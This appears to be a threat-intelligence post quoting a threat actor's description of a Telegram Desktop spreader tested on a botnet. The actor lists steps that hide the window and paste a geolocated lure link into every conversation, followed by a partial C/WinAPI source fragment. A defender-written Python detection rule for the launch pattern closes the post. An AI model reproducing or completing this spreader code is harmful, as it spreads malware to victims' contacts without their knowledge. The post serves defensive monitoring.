November 27, 2020 at 12:43PM

■□□□□ #unconfirmed

Following is a quote from a source / Actor:

I tested it on my botnet and it generated a shitload of traffic. A lot of people told me it’s not easy, not possible, bla bla, so this was one more reason for me to make one.

1. Check that the Telegram path exists
2. Check if process Telegram.exe is running
3. If not, start Telegram.exe, sleep for 30 seconds
4. Check process Telegram.exe
5. If running, spreader gets GEO of current computer on site:
– For example, if country is RU, message will be: “Best photo) link”

6. Sets Clipboard data with message generated with GEO + your link “Best photo) link”
7. If ok, it sets windows out box, so user won’t see the Telegram window anymore
8. Setfocus on Telegram window
9. Click ctrl + menu + home (it will focus the first convo in list)
10. Goes into for loop + presses ctrl + TAB (it selects new convo), since right now there is no option to calculate how many convos it will spam all after each other for the time you config, in KillThread is Sleep (10000); // 10 seconds
11. Simulate ctrl + v (paste), as our message is in clipboard it will paste it in convo window + enter 3 times (on slow computer it takes a bit longer till you see confirm)

So if someone wants to make it better, then update it for everyone. I got no time to work on it right now. A lot can be changed, people can learn from it, have fun.

    ExpandEnvironmentStringsW(L”%appdata%”, wszAppData, sizeof(wszAppData));

    wsprintfW(wszTelegramPath, L”%ls\\Telegram Desktop\\Telegram.exe”, wszAppData);
    if (PathFileExistsW(wszTelegramPath))
        if (IsProcessRunning(“Telegram.exe”) == false)
            ShellExecuteW(NULL, L”open”, wszTelegramPath, NULL, NULL, SW_SHOW);


        if (IsProcessRunning(“Telegram.exe”) == true)
            HINTERNET hOpen, hURL;

            DWORD dwRead;

            char *geo;
            char szData[MAX_PATH];
            WCHAR wszGEOMsg[50];
            WCHAR wszSpreadMsg[500];
            bool GetGEOOk = false;
            hOpen = InternetOpen(“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36”, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);

            if (hOpen != NULL)
                hURL = InternetOpenUrl(hOpen, “”, NULL, 0, 0, 0);

                if (hURL != NULL)

                    InternetReadFile(hURL, szData, sizeof(szData) – 1, &dwRead) && dwRead != 0;
                    geo = strchr(szData, ‘>’);
                    if (geo)
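
A defender-side check for steps 1 to 5 of the quoted description, added here as an example and not taken from the source or the actor's code: it flags a process outside the usual parents that starts Telegram Desktop from %appdata% and opens a network connection around the launch (the GEO lookup). The event field names, the parent allowlist, the 60-second window and all sample events are assumptions constructed for illustration.

```python
import ntpath
from datetime import datetime, timedelta

# Assumption: processes that normally start Telegram Desktop; tune per environment.
EXPECTED_PARENTS = {"explorer.exe", "telegram.exe", "updater.exe"}
TELEGRAM_SUFFIX = r"\telegram desktop\telegram.exe"  # path from step 1, under %appdata%
WINDOW = timedelta(seconds=60)  # assumption: covers the 30-second sleep in step 3

# Constructed events, shaped loosely like Sysmon process-create (1) and network-connect (3).
SAMPLE_EVENTS = [
    {"id": 1, "time": "2020-11-27T12:00:00", "host": "WS01", "parent_pid": 900,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\a\AppData\Roaming\Telegram Desktop\Telegram.exe"},
    {"id": 1, "time": "2020-11-27T12:05:00", "host": "WS02", "parent_pid": 4321,
     "parent_image": r"C:\Users\b\AppData\Local\Temp\viewer.exe",
     "image": r"C:\Users\b\AppData\Roaming\Telegram Desktop\Telegram.exe"},
    {"id": 3, "time": "2020-11-27T12:05:31", "host": "WS02", "pid": 4321,
     "dest_ip": "203.0.113.10", "dest_port": 80},
    {"id": 1, "time": "2020-11-27T12:10:00", "host": "WS03", "parent_pid": 777,
     "parent_image": r"C:\Tools\launcher.exe",
     "image": r"C:\Users\c\AppData\Roaming\Telegram Desktop\Telegram.exe"},
]


def is_unexpected_telegram_launch(event):
    """True for a process-create of Telegram Desktop by a parent outside the allowlist."""
    if event["id"] != 1 or not event["image"].lower().endswith(TELEGRAM_SUFFIX):
        return False
    return ntpath.basename(event["parent_image"]).lower() not in EXPECTED_PARENTS


def find_scripted_telegram_launches(events):
    """Return (host, parent_image, parent_pid) for each unexpected parent that also
    opened a network connection within WINDOW of launching Telegram Desktop."""
    hits = []
    for launch in filter(is_unexpected_telegram_launch, events):
        t0 = datetime.fromisoformat(launch["time"])
        for net in events:
            if net["id"] != 3 or net["host"] != launch["host"]:
                continue
            same_proc = net["pid"] == launch["parent_pid"]
            if same_proc and abs(datetime.fromisoformat(net["time"]) - t0) <= WINDOW:
                hits.append((launch["host"], launch["parent_image"], launch["parent_pid"]))
                break
    return hits


if __name__ == "__main__":
    for hit in find_scripted_telegram_launches(SAMPLE_EVENTS):
        print("review:", hit)
```

The WS03 launch is left unflagged because no network event from the parent accompanies it; such launches can be reviewed separately at lower priority.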